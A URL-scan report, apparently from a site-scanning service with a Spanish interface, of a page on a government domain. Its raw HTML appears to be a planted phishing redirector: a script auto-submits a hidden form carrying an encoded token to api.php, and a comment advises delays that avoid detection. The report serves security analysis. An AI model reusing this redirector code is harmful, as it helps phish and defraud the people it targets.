- ID de exploración:
- 50ff9242-dd18-4b76-9bda-b285feeb4827Finalizado
- URL enviada:
- https://www.predsjednikfbih.gov.ba/en_CA/oiz0GuMblSai5uZXdiZXJ5QGFocGhlbHAuY29t
- Informe finalizado:
Enlaces: 0 encontrados
Los enlaces salientes identificados en la página
Variables JavaScript: 5 encontradas
Las variables JavaScript globales cargadas en el objeto de ventana de una página son variables declaradas fuera de las funciones y a las que se puede acceder desde cualquier lugar del código en el ámbito actual
Nombre | Tipo |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
sleep | function |
onLoad | function |
Mensajes de registro de la consola: 1 encontrados
Mensajes registrados en la consola web
Tipo | Categoría | Registrar |
---|---|---|
error | network |
|
HTML
El cuerpo HTML sin procesar de la página
<html><head></head><body onmouseover="onLoad()" id="bot">
<script>
function sleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
}
async function onLoad() {
await sleep(1000); // Wait time before effective url redirection - Anything under 5000 may be detected so change at your own risk.
document.form.submit();
}
</script>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">
<div style="width: 100%; height: 100%; padding-top: 20%; padding-bottom: 20%;" class="text-center">
<div class="spinner-border text-primary" role="status">
</div>
</div>
<form method="POST" name="form" id="form" action="api.php">
<input name="e84c04c00c8e6f1117a0c7c603adab81" type="hidden" value="37ee4e28a8eb5e83796910444caedd98">
<input name="qToken" type="hidden" value="oiz0GuMblSai5uZXdiZXJ5QGFocGhlbHAuY29t">
<input name="qString" type="hidden" value="">
</form>
</body></html>